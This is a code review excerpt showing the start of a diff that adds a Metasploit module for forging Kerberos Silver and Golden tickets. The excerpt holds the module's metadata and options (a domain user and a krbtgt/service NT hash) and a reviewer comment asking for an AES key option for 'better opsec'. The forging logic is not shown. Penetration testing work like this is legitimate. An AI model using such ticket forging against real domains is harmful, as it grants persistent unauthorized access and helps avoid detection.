modules/auxiliary/admin/kerberos/forge_ticket.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Kerberos::Client
+  include Msf::Exploit::Remote::Kerberos::Ticket
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kerberos Silver/Golden Ticket Forging',
+        'Description' => %q{
+          This module forges a Kerberos ticket
+        },
+        'Author' => [
+          'Benjamin Delpy', # Original Implementation
+          'Dean Welch' # Metasploit Module
+        ],
+        'References' => [
+          %w[URL https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it]
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [],
+          'Reliability' => [],
+          'AKA' => ['Silver Ticket', 'Golden Ticket', 'Ticketer']
+        },
+        'Actions' => [
+          ['FORGE_SILVER', { 'Description' => 'Forge a Silver Ticket' } ],
+          ['FORGE_GOLDEN', { 'Description' => 'Forge a Golden Ticket' } ],
+        ],
+        'DefaultAction' => 'FORGE_SILVER'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'The Domain User' ]),
+        OptString.new('NTHASH', [ true, 'The krbtgt/service nthash' ]),
```

Comment:
not a blocker: We'll want a (jira) ticket for adding an aeskey option which has better opsec